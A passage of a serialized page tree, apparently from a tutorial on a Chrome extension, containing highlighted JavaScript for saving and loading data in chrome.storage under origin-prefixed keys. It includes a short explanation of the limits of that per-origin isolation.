76],{"type":33,"tag":128,"props":17377,"children":17378},{"style":312},[17379],{"type":38,"value":854},{"type":33,"tag":128,"props":17381,"children":17382},{"class":130,"line":1051},[17383],{"type":33,"tag":128,"props":17384,"children":17385},{"emptyLinePlaceholder":896},[17386],{"type":38,"value":899},{"type":33,"tag":128,"props":17388,"children":17389},{"class":130,"line":1063},[17390,17394,17398,17402,17406],{"type":33,"tag":128,"props":17391,"children":17392},{"style":300},[17393],{"type":38,"value":13862},{"type":33,"tag":128,"props":17395,"children":17396},{"style":300},[17397],{"type":38,"value":15428},{"type":33,"tag":128,"props":17399,"children":17400},{"style":135},[17401],{"type":38,"value":15508},{"type":33,"tag":128,"props":17403,"children":17404},{"style":312},[17405],{"type":38,"value":9376},{"type":33,"tag":128,"props":17407,"children":17408},{"style":312},[17409],{"type":38,"value":762},{"type":33,"tag":128,"props":17411,"children":17412},{"class":130,"line":1076},[17413,17417,17421,17425,17429,17433,17437,17441,17445,17449,17453],{"type":33,"tag":128,"props":17414,"children":17415},{"style":300},[17416],{"type":38,"value":15915},{"type":33,"tag":128,"props":17418,"children":17419},{"style":306},[17420],{"type":38,"value":15920},{"type":33,"tag":128,"props":17422,"children":17423},{"style":312},[17424],{"type":38,"value":5657},{"type":33,"tag":128,"props":17426,"children":17427},{"style":306},[17428],{"type":38,"value":7562},{"type":33,"tag":128,"props":17430,"children":17431},{"style":312},[17432],{"type":38,"value":215},{"type":33,"tag":128,"props":17434,"children":17435},{"style":135},[17436],{"type":38,"value":7806},{"type":33,"tag":128,"props":17438,"children":17439},{"style":312},[17440],{"type":38,"value":5566},{"type":33,"tag":128,"props":17442,"children":17443},{"style":676},[17444],{"type":38,"value":6040},{"type":33,"tag":128,"props":17446,"children":17447},{"style":140},[17448],{"type":38,"value":14882},{"type":33,"tag":128,"props":17450
,"children":17451},{"style":676},[17452],{"type":38,"value":6040},{"type":33,"tag":128,"props":17454,"children":17455},{"style":312},[17456],{"type":38,"value":5815},{"type":33,"tag":128,"props":17458,"children":17459},{"class":130,"line":1089},[17460,17464,17468,17472,17476,17480,17484,17488],{"type":33,"tag":128,"props":17461,"children":17462},{"style":1576},[17463],{"type":38,"value":15964},{"type":33,"tag":128,"props":17465,"children":17466},{"style":312},[17467],{"type":38,"value":2852},{"type":33,"tag":128,"props":17469,"children":17470},{"style":300},[17471],{"type":38,"value":15973},{"type":33,"tag":128,"props":17473,"children":17474},{"style":306},[17475],{"type":38,"value":16183},{"type":33,"tag":128,"props":17477,"children":17478},{"style":300},[17479],{"type":38,"value":15983},{"type":33,"tag":128,"props":17481,"children":17482},{"style":306},[17483],{"type":38,"value":15920},{"type":33,"tag":128,"props":17485,"children":17486},{"style":312},[17487],{"type":38,"value":2966},{"type":33,"tag":128,"props":17489,"children":17490},{"style":312},[17491],{"type":38,"value":762},{"type":33,"tag":128,"props":17493,"children":17494},{"class":130,"line":1101},[17495,17500,17504,17509,17513,17517,17522,17526,17530,17534,17538,17542,17547,17551],{"type":33,"tag":128,"props":17496,"children":17497},{"style":306},[17498],{"type":38,"value":17499},"    
input",{"type":33,"tag":128,"props":17501,"children":17502},{"style":312},[17503],{"type":38,"value":215},{"type":33,"tag":128,"props":17505,"children":17506},{"style":135},[17507],{"type":38,"value":17508},"addEventListener",{"type":33,"tag":128,"props":17510,"children":17511},{"style":312},[17512],{"type":38,"value":5566},{"type":33,"tag":128,"props":17514,"children":17515},{"style":676},[17516],{"type":38,"value":6040},{"type":33,"tag":128,"props":17518,"children":17519},{"style":140},[17520],{"type":38,"value":17521},"change",{"type":33,"tag":128,"props":17523,"children":17524},{"style":676},[17525],{"type":38,"value":6040},{"type":33,"tag":128,"props":17527,"children":17528},{"style":312},[17529],{"type":38,"value":5584},{"type":33,"tag":128,"props":17531,"children":17532},{"style":300},[17533],{"type":38,"value":5598},{"type":33,"tag":128,"props":17535,"children":17536},{"style":300},[17537],{"type":38,"value":15428},{"type":33,"tag":128,"props":17539,"children":17540},{"style":312},[17541],{"type":38,"value":2852},{"type":33,"tag":128,"props":17543,"children":17544},{"style":306},[17545],{"type":38,"value":17546},"event",{"type":33,"tag":128,"props":17548,"children":17549},{"style":312},[17550],{"type":38,"value":2966},{"type":33,"tag":128,"props":17552,"children":17553},{"style":312},[17554],{"type":38,"value":762},{"type":33,"tag":128,"props":17556,"children":17557},{"class":130,"line":1114},[17558,17563,17567,17571,17576,17580,17585,17589,17593],{"type":33,"tag":128,"props":17559,"children":17560},{"style":300},[17561],{"type":38,"value":17562},"      const",{"type":33,"tag":128,"props":17564,"children":17565},{"style":306},[17566],{"type":38,"value":5027},{"type":33,"tag":128,"props":17568,"children":17569},{"style":312},[17570],{"type":38,"value":5657},{"type":33,"tag":128,"props":17572,"children":17573},{"style":306},[17574],{"type":38,"value":17575}," 
event",{"type":33,"tag":128,"props":17577,"children":17578},{"style":312},[17579],{"type":38,"value":215},{"type":33,"tag":128,"props":17581,"children":17582},{"style":306},[17583],{"type":38,"value":17584},"target",{"type":33,"tag":128,"props":17586,"children":17587},{"style":312},[17588],{"type":38,"value":215},{"type":33,"tag":128,"props":17590,"children":17591},{"style":306},[17592],{"type":38,"value":12126},{"type":33,"tag":128,"props":17594,"children":17595},{"style":312},[17596],{"type":38,"value":5676},{"type":33,"tag":128,"props":17598,"children":17599},{"class":130,"line":1127},[17600,17604,17608,17612,17616,17620,17624,17628,17632],{"type":33,"tag":128,"props":17601,"children":17602},{"style":300},[17603],{"type":38,"value":17562},{"type":33,"tag":128,"props":17605,"children":17606},{"style":306},[17607],{"type":38,"value":13031},{"type":33,"tag":128,"props":17609,"children":17610},{"style":312},[17611],{"type":38,"value":5657},{"type":33,"tag":128,"props":17613,"children":17614},{"style":306},[17615],{"type":38,"value":17575},{"type":33,"tag":128,"props":17617,"children":17618},{"style":312},[17619],{"type":38,"value":215},{"type":33,"tag":128,"props":17621,"children":17622},{"style":306},[17623],{"type":38,"value":17584},{"type":33,"tag":128,"props":17625,"children":17626},{"style":312},[17627],{"type":38,"value":215},{"type":33,"tag":128,"props":17629,"children":17630},{"style":306},[17631],{"type":38,"value":14160},{"type":33,"tag":128,"props":17633,"children":17634},{"style":312},[17635],{"type":38,"value":5676},{"type":33,"tag":128,"props":17637,"children":17638},{"class":130,"line":1139},[17639,17643,17647,17651,17655,17659,17663,17667,17671,17675,17679],{"type":33,"tag":128,"props":17640,"children":17641},{"style":1576},[17642],{"type":38,"value":13561},{"type":33,"tag":128,"props":17644,"children":17645},{"style":312},[17646],{"type":38,"value":2852},{"type":33,"tag":128,"props":17648,"children":17649},{"style":300},[17650],{"type":38,"value":164
24},{"type":33,"tag":128,"props":17652,"children":17653},{"style":306},[17654],{"type":38,"value":14160},{"type":33,"tag":128,"props":17656,"children":17657},{"style":312},[17658],{"type":38,"value":215},{"type":33,"tag":128,"props":17660,"children":17661},{"style":135},[17662],{"type":38,"value":6957},{"type":33,"tag":128,"props":17664,"children":17665},{"style":312},[17666],{"type":38,"value":5566},{"type":33,"tag":128,"props":17668,"children":17669},{"style":676},[17670],{"type":38,"value":669},{"type":33,"tag":128,"props":17672,"children":17673},{"style":140},[17674],{"type":38,"value":17149},{"type":33,"tag":128,"props":17676,"children":17677},{"style":676},[17678],{"type":38,"value":669},{"type":33,"tag":128,"props":17680,"children":17681},{"style":312},[17682],{"type":38,"value":17683},")){\n",{"type":33,"tag":128,"props":17685,"children":17686},{"class":130,"line":1152},[17687],{"type":33,"tag":128,"props":17688,"children":17689},{"style":1576},[17690],{"type":38,"value":17691},"        return\n",{"type":33,"tag":128,"props":17693,"children":17694},{"class":130,"line":1165},[17695],{"type":33,"tag":128,"props":17696,"children":17697},{"style":312},[17698],{"type":38,"value":13656},{"type":33,"tag":128,"props":17700,"children":17701},{"class":130,"line":1177},[17702,17707],{"type":33,"tag":128,"props":17703,"children":17704},{"style":1576},[17705],{"type":38,"value":17706},"      try",{"type":33,"tag":128,"props":17708,"children":17709},{"style":312},[17710],{"type":38,"value":762},{"type":33,"tag":128,"props":17712,"children":17713},{"class":130,"line":1189},[17714,17719,17723,17727,17731,17735,17739],{"type":33,"tag":128,"props":17715,"children":17716},{"style":1576},[17717],{"type":38,"value":17718},"        
await",{"type":33,"tag":128,"props":17720,"children":17721},{"style":135},[17722],{"type":38,"value":13013},{"type":33,"tag":128,"props":17724,"children":17725},{"style":312},[17726],{"type":38,"value":5836},{"type":33,"tag":128,"props":17728,"children":17729},{"style":306},[17730],{"type":38,"value":5027},{"type":33,"tag":128,"props":17732,"children":17733},{"style":312},[17734],{"type":38,"value":5584},{"type":33,"tag":128,"props":17736,"children":17737},{"style":306},[17738],{"type":38,"value":13031},{"type":33,"tag":128,"props":17740,"children":17741},{"style":312},[17742],{"type":38,"value":5863},{"type":33,"tag":128,"props":17744,"children":17745},{"class":130,"line":1202},[17746,17750,17754,17758,17762,17766,17771,17775],{"type":33,"tag":128,"props":17747,"children":17748},{"style":306},[17749],{"type":38,"value":16105},{"type":33,"tag":128,"props":17751,"children":17752},{"style":312},[17753],{"type":38,"value":215},{"type":33,"tag":128,"props":17755,"children":17756},{"style":135},[17757],{"type":38,"value":13157},{"type":33,"tag":128,"props":17759,"children":17760},{"style":312},[17761],{"type":38,"value":5566},{"type":33,"tag":128,"props":17763,"children":17764},{"style":676},[17765],{"type":38,"value":6040},{"type":33,"tag":128,"props":17767,"children":17768},{"style":140},[17769],{"type":38,"value":17770},"Data saved",{"type":33,"tag":128,"props":17772,"children":17773},{"style":676},[17774],{"type":38,"value":6040},{"type":33,"tag":128,"props":17776,"children":17777},{"style":312},[17778],{"type":38,"value":5815},{"type":33,"tag":128,"props":17780,"children":17781},{"class":130,"line":1214},[17782,17787,17791,17795,17799,17803],{"type":33,"tag":128,"props":17783,"children":17784},{"style":312},[17785],{"type":38,"value":17786},"      
}",{"type":33,"tag":128,"props":17788,"children":17789},{"style":1576},[17790],{"type":38,"value":6855},{"type":33,"tag":128,"props":17792,"children":17793},{"style":312},[17794],{"type":38,"value":2852},{"type":33,"tag":128,"props":17796,"children":17797},{"style":306},[17798],{"type":38,"value":6889},{"type":33,"tag":128,"props":17800,"children":17801},{"style":312},[17802],{"type":38,"value":2966},{"type":33,"tag":128,"props":17804,"children":17805},{"style":312},[17806],{"type":38,"value":762},{"type":33,"tag":128,"props":17808,"children":17809},{"class":130,"line":1226},[17810,17814,17818,17822,17826,17830,17835,17839,17843,17847],{"type":33,"tag":128,"props":17811,"children":17812},{"style":306},[17813],{"type":38,"value":16105},{"type":33,"tag":128,"props":17815,"children":17816},{"style":312},[17817],{"type":38,"value":215},{"type":33,"tag":128,"props":17819,"children":17820},{"style":135},[17821],{"type":38,"value":13157},{"type":33,"tag":128,"props":17823,"children":17824},{"style":312},[17825],{"type":38,"value":5566},{"type":33,"tag":128,"props":17827,"children":17828},{"style":676},[17829],{"type":38,"value":6040},{"type":33,"tag":128,"props":17831,"children":17832},{"style":140},[17833],{"type":38,"value":17834},"Error saving 
data",{"type":33,"tag":128,"props":17836,"children":17837},{"style":676},[17838],{"type":38,"value":6040},{"type":33,"tag":128,"props":17840,"children":17841},{"style":312},[17842],{"type":38,"value":5584},{"type":33,"tag":128,"props":17844,"children":17845},{"style":306},[17846],{"type":38,"value":14251},{"type":33,"tag":128,"props":17848,"children":17849},{"style":312},[17850],{"type":38,"value":5815},{"type":33,"tag":128,"props":17852,"children":17853},{"class":130,"line":1239},[17854],{"type":33,"tag":128,"props":17855,"children":17856},{"style":312},[17857],{"type":38,"value":13656},{"type":33,"tag":128,"props":17859,"children":17860},{"class":130,"line":1251},[17861],{"type":33,"tag":128,"props":17862,"children":17863},{"style":312},[17864],{"type":38,"value":13745},{"type":33,"tag":128,"props":17866,"children":17867},{"class":130,"line":1263},[17868],{"type":33,"tag":128,"props":17869,"children":17870},{"style":312},[17871],{"type":38,"value":845},{"type":33,"tag":128,"props":17873,"children":17874},{"class":130,"line":1276},[17875],{"type":33,"tag":128,"props":17876,"children":17877},{"style":312},[17878],{"type":38,"value":854},{"type":33,"tag":81,"props":17880,"children":17881},{"id":12449},[17882],{"type":38,"value":17883},"Background:",{"type":33,"tag":47,"props":17885,"children":17886},{},[17887],{"type":38,"value":17888},"The background script will listen for two events:",{"type":33,"tag":47,"props":17890,"children":17891},{},[17892,17897,17898,17903],{"type":33,"tag":105,"props":17893,"children":17895},{"className":17894},[],[17896],{"type":38,"value":14091},{"type":38,"value":6345},{"type":33,"tag":105,"props":17899,"children":17901},{"className":17900},[],[17902],{"type":38,"value":14303},{"type":38,"value":17904},". These events are processed in order to update or retrieve elements from the chrome storage. 
It is important to note that the Chrome storage is scoped per origin: the background script appends the origin to every key (key + \"-\" + origin), so each key and value stored or retrieved is tied to one origin. Two details matter for security here. First, chrome.storage.local itself is extension-wide and is not partitioned by the browser; the per-origin separation is purely the key prefix this extension adds. Second, that origin is not taken from the sending frame itself (sender.origin / sender.url) but derived from the tab's URL (sender.tab.pendingUrl ?? sender.tab.url), so the isolation is only as strong as that lookup reflecting the page that actually sent the message.",{"type":33,"tag":114,"props":17906,"children":17907},{"lang":5526},[17908],{"type":33,"tag":119,"props":17909,"children":17911},{"className":5530,"code":17910,"language":5526,"meta":8,"style":8},"function save(key, value, origin) {\n  return new Promise((resolve, reject) => {\n    key = key + \"-\" + origin;\n    console.log(\"Saving: \", key, value);\n    chrome.storage.local.set({ [key]: value }, () => {\n      resolve({ message: 'Data saved successfully' })\n    })\n  })\n}\nfunction load(key, origin) {\n  return new Promise((resolve, reject) => {\n    key = key + \"-\" + origin;\n    console.log(\"Loading: \", key);\n    chrome.storage.local.get([key], data => {\n      if (data.hasOwnProperty(key) === false) {\n        return reject({ message: 'Data not found' });\n      }\n      console.log(\"Data: \", data[key]);\n      resolve(data[key]);\n    });\n  });\n}\n\nchrome.runtime.onMessage.addListener((request, sender, sendResponse) => {\n  new Promise(async () => {\n    const sender_origin = new URL(sender.tab.pendingUrl ?? 
sender.tab.url).origin;\n    console.log(\"Sender Origin: \", sender_origin);\n    console.log(\"Request: \", request);\n    if (request.type === \"SAVE\") {\n      save(request.payload.key, request.payload.value, sender_origin)\n        .then(response => sendResponse(response))\n        .catch(error => sendResponse({ error }));\n    } else if (request.type === \"LOAD\") {\n      load(request.payload.key, sender_origin)\n        .then(response => sendResponse(response))\n        .catch(error => sendResponse({ error }));\n    }\n  })\n  return true;\n});\n",[17912],{"type":33,"tag":105,"props":17913,"children":17914},{"__ignoreMap":8},[17915,17958,18001,18044,18095,18162,18197,18204,18211,18218,18253,18296,18339,18382,18437,18488,18527,18534,18585,18612,18619,18626,18633,18640,18707,18738,18821,18864,18907,18954,19021,19060,19099,19154,19197,19236,19275,19282,19289,19304],{"type":33,"tag":128,"props":17916,"children":17917},{"class":130,"line":131},[17918,17922,17926,17930,17934,17938,17942,17946,17950,17954],{"type":33,"tag":128,"props":17919,"children":17920},{"style":300},[17921],{"type":38,"value":13008},{"type":33,"tag":128,"props":17923,"children":17924},{"style":135},[17925],{"type":38,"value":13013},{"type":33,"tag":128,"props":17927,"children":17928},{"style":312},[17929],{"type":38,"value":5566},{"type":33,"tag":128,"props":17931,"children":17932},{"style":306},[17933],{"type":38,"value":13022},{"type":33,"tag":128,"props":17935,"children":17936},{"style":312},[17937],{"type":38,"value":5584},{"type":33,"tag":128,"props":17939,"children":17940},{"style":306},[17941],{"type":38,"value":13031},{"type":33,"tag":128,"props":17943,"children":17944},{"style":312},[17945],{"type":38,"value":5584},{"type":33,"tag":128,"props":17947,"children":17948},{"style":306},[17949],{"type":38,"value":13040},{"type":33,"tag":128,"props":17951,"children":17952},{"style":312},[17953],{"type":38,"value":2966},{"type":33,"tag":128,"props":17955,"children":17956},{"style":312},[179
57],{"type":38,"value":762},{"type":33,"tag":128,"props":17959,"children":17960},{"class":130,"line":362},[17961,17965,17969,17973,17977,17981,17985,17989,17993,17997],{"type":33,"tag":128,"props":17962,"children":17963},{"style":1576},[17964],{"type":38,"value":13056},{"type":33,"tag":128,"props":17966,"children":17967},{"style":300},[17968],{"type":38,"value":13061},{"type":33,"tag":128,"props":17970,"children":17971},{"style":437},[17972],{"type":38,"value":13066},{"type":33,"tag":128,"props":17974,"children":17975},{"style":312},[17976],{"type":38,"value":13071},{"type":33,"tag":128,"props":17978,"children":17979},{"style":306},[17980],{"type":38,"value":13076},{"type":33,"tag":128,"props":17982,"children":17983},{"style":312},[17984],{"type":38,"value":5584},{"type":33,"tag":128,"props":17986,"children":17987},{"style":306},[17988],{"type":38,"value":13085},{"type":33,"tag":128,"props":17990,"children":17991},{"style":312},[17992],{"type":38,"value":2966},{"type":33,"tag":128,"props":17994,"children":17995},{"style":312},[17996],{"type":38,"value":5625},{"type":33,"tag":128,"props":17998,"children":17999},{"style":312},[18000],{"type":38,"value":762},{"type":33,"tag":128,"props":18002,"children":18003},{"class":130,"line":403},[18004,18008,18012,18016,18020,18024,18028,18032,18036,18040],{"type":33,"tag":128,"props":18005,"children":18006},{"style":306},[18007],{"type":38,"value":13105},{"type":33,"tag":128,"props":18009,"children":18010},{"style":312},[18011],{"type":38,"value":5657},{"type":33,"tag":128,"props":18013,"children":18014},{"style":306},[18015],{"type":38,"value":5027},{"type":33,"tag":128,"props":18017,"children":18018},{"style":300},[18019],{"type":38,"value":8297},{"type":33,"tag":128,"props":18021,"children":18022},{"style":676},[18023],{"type":38,"value":679},{"type":33,"tag":128,"props":18025,"children":18026},{"style":140},[18027],{"type":38,"value":907},{"type":33,"tag":128,"props":18029,"children":18030},{"style":676},[18031],{"type":38,"
value":669},{"type":33,"tag":128,"props":18033,"children":18034},{"style":300},[18035],{"type":38,"value":8297},{"type":33,"tag":128,"props":18037,"children":18038},{"style":306},[18039],{"type":38,"value":13040},{"type":33,"tag":128,"props":18041,"children":18042},{"style":312},[18043],{"type":38,"value":5676},{"type":33,"tag":128,"props":18045,"children":18046},{"class":130,"line":739},[18047,18051,18055,18059,18063,18067,18071,18075,18079,18083,18087,18091],{"type":33,"tag":128,"props":18048,"children":18049},{"style":306},[18050],{"type":38,"value":6880},{"type":33,"tag":128,"props":18052,"children":18053},{"style":312},[18054],{"type":38,"value":215},{"type":33,"tag":128,"props":18056,"children":18057},{"style":135},[18058],{"type":38,"value":13157},{"type":33,"tag":128,"props":18060,"children":18061},{"style":312},[18062],{"type":38,"value":5566},{"type":33,"tag":128,"props":18064,"children":18065},{"style":676},[18066],{"type":38,"value":669},{"type":33,"tag":128,"props":18068,"children":18069},{"style":140},[18070],{"type":38,"value":13170},{"type":33,"tag":128,"props":18072,"children":18073},{"style":676},[18074],{"type":38,"value":669},{"type":33,"tag":128,"props":18076,"children":18077},{"style":312},[18078],{"type":38,"value":5584},{"type":33,"tag":128,"props":18080,"children":18081},{"style":306},[18082],{"type":38,"value":5027},{"type":33,"tag":128,"props":18084,"children":18085},{"style":312},[18086],{"type":38,"value":5584},{"type":33,"tag":128,"props":18088,"children":18089},{"style":306},[18090],{"type":38,"value":13031},{"type":33,"tag":128,"props":18092,"children":18093},{"style":312},[18094],{"type":38,"value":5815},{"type":33,"tag":128,"props":18096,"children":18097},{"class":130,"line":765},[18098,18102,18106,18110,18114,18118,18122,18126,18130,18134,18138,18142,18146,18150,18154,18158],{"type":33,"tag":128,"props":18099,"children":18100},{"style":306},[18101],{"type":38,"value":13202},{"type":33,"tag":128,"props":18103,"children":18104},{"sty
le":312},[18105],{"type":38,"value":215},{"type":33,"tag":128,"props":18107,"children":18108},{"style":306},[18109],{"type":38,"value":12636},{"type":33,"tag":128,"props":18111,"children":18112},{"style":312},[18113],{"type":38,"value":215},{"type":33,"tag":128,"props":18115,"children":18116},{"style":306},[18117],{"type":38,"value":13219},{"type":33,"tag":128,"props":18119,"children":18120},{"style":312},[18121],{"type":38,"value":215},{"type":33,"tag":128,"props":18123,"children":18124},{"style":135},[18125],{"type":38,"value":13228},{"type":33,"tag":128,"props":18127,"children":18128},{"style":312},[18129],{"type":38,"value":5836},{"type":33,"tag":128,"props":18131,"children":18132},{"style":312},[18133],{"type":38,"value":718},{"type":33,"tag":128,"props":18135,"children":18136},{"style":306},[18137],{"type":38,"value":13022},{"type":33,"tag":128,"props":18139,"children":18140},{"style":312},[18141],{"type":38,"value":13245},{"type":33,"tag":128,"props":18143,"children":18144},{"style":306},[18145],{"type":38,"value":13031},{"type":33,"tag":128,"props":18147,"children":18148},{"style":312},[18149],{"type":38,"value":13254},{"type":33,"tag":128,"props":18151,"children":18152},{"style":312},[18153],{"type":38,"value":13259},{"type":33,"tag":128,"props":18155,"children":18156},{"style":312},[18157],{"type":38,"value":5625},{"type":33,"tag":128,"props":18159,"children":18160},{"style":312},[18161],{"type":38,"value":762},{"type":33,"tag":128,"props":18163,"children":18164},{"class":130,"line":804},[18165,18169,18173,18177,18181,18185,18189,18193],{"type":33,"tag":128,"props":18166,"children":18167},{"style":135},[18168],{"type":38,"value":13275},{"type":33,"tag":128,"props":18170,"children":18171},{"style":312},[18172],{"type":38,"value":5836},{"type":33,"tag":128,"props":18174,"children":18175},{"style":437},[18176],{"type":38,"value":6730},{"type":33,"tag":128,"props":18178,"children":18179},{"style":312},[18180],{"type":38,"value":284},{"type":33,"tag":128,"props
":18182,"children":18183},{"style":676},[18184],{"type":38,"value":6739},{"type":33,"tag":128,"props":18186,"children":18187},{"style":140},[18188],{"type":38,"value":13296},{"type":33,"tag":128,"props":18190,"children":18191},{"style":676},[18192],{"type":38,"value":6040},{"type":33,"tag":128,"props":18194,"children":18195},{"style":312},[18196],{"type":38,"value":13305},{"type":33,"tag":128,"props":18198,"children":18199},{"class":130,"line":839},[18200],{"type":33,"tag":128,"props":18201,"children":18202},{"style":312},[18203],{"type":38,"value":13313},{"type":33,"tag":128,"props":18205,"children":18206},{"class":130,"line":848},[18207],{"type":33,"tag":128,"props":18208,"children":18209},{"style":312},[18210],{"type":38,"value":13321},{"type":33,"tag":128,"props":18212,"children":18213},{"class":130,"line":976},[18214],{"type":33,"tag":128,"props":18215,"children":18216},{"style":312},[18217],{"type":38,"value":854},{"type":33,"tag":128,"props":18219,"children":18220},{"class":130,"line":988},[18221,18225,18229,18233,18237,18241,18245,18249],{"type":33,"tag":128,"props":18222,"children":18223},{"style":300},[18224],{"type":38,"value":13008},{"type":33,"tag":128,"props":18226,"children":18227},{"style":135},[18228],{"type":38,"value":13340},{"type":33,"tag":128,"props":18230,"children":18231},{"style":312},[18232],{"type":38,"value":5566},{"type":33,"tag":128,"props":18234,"children":18235},{"style":306},[18236],{"type":38,"value":13022},{"type":33,"tag":128,"props":18238,"children":18239},{"style":312},[18240],{"type":38,"value":5584},{"type":33,"tag":128,"props":18242,"children":18243},{"style":306},[18244],{"type":38,"value":13040},{"type":33,"tag":128,"props":18246,"children":18247},{"style":312},[18248],{"type":38,"value":2966},{"type":33,"tag":128,"props":18250,"children":18251},{"style":312},[18252],{"type":38,"value":762},{"type":33,"tag":128,"props":18254,"children":18255},{"class":130,"line":1001},[18256,18260,18264,18268,18272,18276,18280,18284,18288,1
8292],{"type":33,"tag":128,"props":18257,"children":18258},{"style":1576},[18259],{"type":38,"value":13056},{"type":33,"tag":128,"props":18261,"children":18262},{"style":300},[18263],{"type":38,"value":13061},{"type":33,"tag":128,"props":18265,"children":18266},{"style":437},[18267],{"type":38,"value":13066},{"type":33,"tag":128,"props":18269,"children":18270},{"style":312},[18271],{"type":38,"value":13071},{"type":33,"tag":128,"props":18273,"children":18274},{"style":306},[18275],{"type":38,"value":13076},{"type":33,"tag":128,"props":18277,"children":18278},{"style":312},[18279],{"type":38,"value":5584},{"type":33,"tag":128,"props":18281,"children":18282},{"style":306},[18283],{"type":38,"value":13085},{"type":33,"tag":128,"props":18285,"children":18286},{"style":312},[18287],{"type":38,"value":2966},{"type":33,"tag":128,"props":18289,"children":18290},{"style":312},[18291],{"type":38,"value":5625},{"type":33,"tag":128,"props":18293,"children":18294},{"style":312},[18295],{"type":38,"value":762},{"type":33,"tag":128,"props":18297,"children":18298},{"class":130,"line":1014},[18299,18303,18307,18311,18315,18319,18323,18327,18331,18335],{"type":33,"tag":128,"props":18300,"children":18301},{"style":306},[18302],{"type":38,"value":13105},{"type":33,"tag":128,"props":18304,"children":18305},{"style":312},[18306],{"type":38,"value":5657},{"type":33,"tag":128,"props":18308,"children":18309},{"style":306},[18310],{"type":38,"value":5027},{"type":33,"tag":128,"props":18312,"children":18313},{"style":300},[18314],{"type":38,"value":8297},{"type":33,"tag":128,"props":18316,"children":18317},{"style":676},[18318],{"type":38,"value":679},{"type":33,"tag":128,"props":18320,"children":18321},{"style":140},[18322],{"type":38,"value":907},{"type":33,"tag":128,"props":18324,"children":18325},{"style":676},[18326],{"type":38,"value":669},{"type":33,"tag":128,"props":18328,"children":18329},{"style":300},[18330],{"type":38,"value":8297},{"type":33,"tag":128,"props":18332,"children":183
33},{"style":306},[18334],{"type":38,"value":13040},{"type":33,"tag":128,"props":18336,"children":18337},{"style":312},[18338],{"type":38,"value":5676},{"type":33,"tag":128,"props":18340,"children":18341},{"class":130,"line":1026},[18342,18346,18350,18354,18358,18362,18366,18370,18374,18378],{"type":33,"tag":128,"props":18343,"children":18344},{"style":306},[18345],{"type":38,"value":6880},{"type":33,"tag":128,"props":18347,"children":18348},{"style":312},[18349],{"type":38,"value":215},{"type":33,"tag":128,"props":18351,"children":18352},{"style":135},[18353],{"type":38,"value":13157},{"type":33,"tag":128,"props":18355,"children":18356},{"style":312},[18357],{"type":38,"value":5566},{"type":33,"tag":128,"props":18359,"children":18360},{"style":676},[18361],{"type":38,"value":669},{"type":33,"tag":128,"props":18363,"children":18364},{"style":140},[18365],{"type":38,"value":13478},{"type":33,"tag":128,"props":18367,"children":18368},{"style":676},[18369],{"type":38,"value":669},{"type":33,"tag":128,"props":18371,"children":18372},{"style":312},[18373],{"type":38,"value":5584},{"type":33,"tag":128,"props":18375,"children":18376},{"style":306},[18377],{"type":38,"value":5027},{"type":33,"tag":128,"props":18379,"children":18380},{"style":312},[18381],{"type":38,"value":5815},{"type":33,"tag":128,"props":18383,"children":18384},{"class":130,"line":1038},[18385,18389,18393,18397,18401,18405,18409,18413,18417,18421,18425,18429,18433],{"type":33,"tag":128,"props":18386,"children":18387},{"style":306},[18388],{"type":38,"value":13202},{"type":33,"tag":128,"props":18390,"children":18391},{"style":312},[18392],{"type":38,"value":215},{"type":33,"tag":128,"props":18394,"children":18395},{"style":306},[18396],{"type":38,"value":12636},{"type":33,"tag":128,"props":18398,"children":18399},{"style":312},[18400],{"type":38,"value":215},{"type":33,"tag":128,"props":18402,"children":18403},{"style":306},[18404],{"type":38,"value":13219},{"type":33,"tag":128,"props":18406,"children":18
407},{"style":312},[18408],{"type":38,"value":215},{"type":33,"tag":128,"props":18410,"children":18411},{"style":135},[18412],{"type":38,"value":13526},{"type":33,"tag":128,"props":18414,"children":18415},{"style":312},[18416],{"type":38,"value":13531},{"type":33,"tag":128,"props":18418,"children":18419},{"style":306},[18420],{"type":38,"value":13022},{"type":33,"tag":128,"props":18422,"children":18423},{"style":312},[18424],{"type":38,"value":13540},{"type":33,"tag":128,"props":18426,"children":18427},{"style":306},[18428],{"type":38,"value":13545},{"type":33,"tag":128,"props":18430,"children":18431},{"style":312},[18432],{"type":38,"value":5625},{"type":33,"tag":128,"props":18434,"children":18435},{"style":312},[18436],{"type":38,"value":762},{"type":33,"tag":128,"props":18438,"children":18439},{"class":130,"line":1051},[18440,18444,18448,18452,18456,18460,18464,18468,18472,18476,18480,18484],{"type":33,"tag":128,"props":18441,"children":18442},{"style":1576},[18443],{"type":38,"value":13561},{"type":33,"tag":128,"props":18445,"children":18446},{"style":312},[18447],{"type":38,"value":2852},{"type":33,"tag":128,"props":18449,"children":18450},{"style":306},[18451],{"type":38,"value":2815},{"type":33,"tag":128,"props":18453,"children":18454},{"style":312},[18455],{"type":38,"value":215},{"type":33,"tag":128,"props":18457,"children":18458},{"style":135},[18459],{"type":38,"value":13578},{"type":33,"tag":128,"props":18461,"children":18462},{"style":312},[18463],{"type":38,"value":5566},{"type":33,"tag":128,"props":18465,"children":18466},{"style":306},[18467],{"type":38,"value":13022},{"type":33,"tag":128,"props":18469,"children":18470},{"style":312},[18471],{"type":38,"value":2966},{"type":33,"tag":128,"props":18473,"children":18474},{"style":300},[18475],{"type":38,"value":13595},{"type":33,"tag":128,"props":18477,"children":18478},{"style":1576},[18479],{"type":38,"value":6721},{"type":33,"tag":128,"props":18481,"children":18482},{"style":312},[18483],{"type":38,"
value":2966},{"type":33,"tag":128,"props":18485,"children":18486},{"style":312},[18487],{"type":38,"value":762},{"type":33,"tag":128,"props":18489,"children":18490},{"class":130,"line":1063},[18491,18495,18499,18503,18507,18511,18515,18519,18523],{"type":33,"tag":128,"props":18492,"children":18493},{"style":1576},[18494],{"type":38,"value":13615},{"type":33,"tag":128,"props":18496,"children":18497},{"style":135},[18498],{"type":38,"value":13085},{"type":33,"tag":128,"props":18500,"children":18501},{"style":312},[18502],{"type":38,"value":5836},{"type":33,"tag":128,"props":18504,"children":18505},{"style":437},[18506],{"type":38,"value":6730},{"type":33,"tag":128,"props":18508,"children":18509},{"style":312},[18510],{"type":38,"value":284},{"type":33,"tag":128,"props":18512,"children":18513},{"style":676},[18514],{"type":38,"value":6739},{"type":33,"tag":128,"props":18516,"children":18517},{"style":140},[18518],{"type":38,"value":13640},{"type":33,"tag":128,"props":18520,"children":18521},{"style":676},[18522],{"type":38,"value":6040},{"type":33,"tag":128,"props":18524,"children":18525},{"style":312},[18526],{"type":38,"value":5863},{"type":33,"tag":128,"props":18528,"children":18529},{"class":130,"line":1076},[18530],{"type":33,"tag":128,"props":18531,"children":18532},{"style":312},[18533],{"type":38,"value":13656},{"type":33,"tag":128,"props":18535,"children":1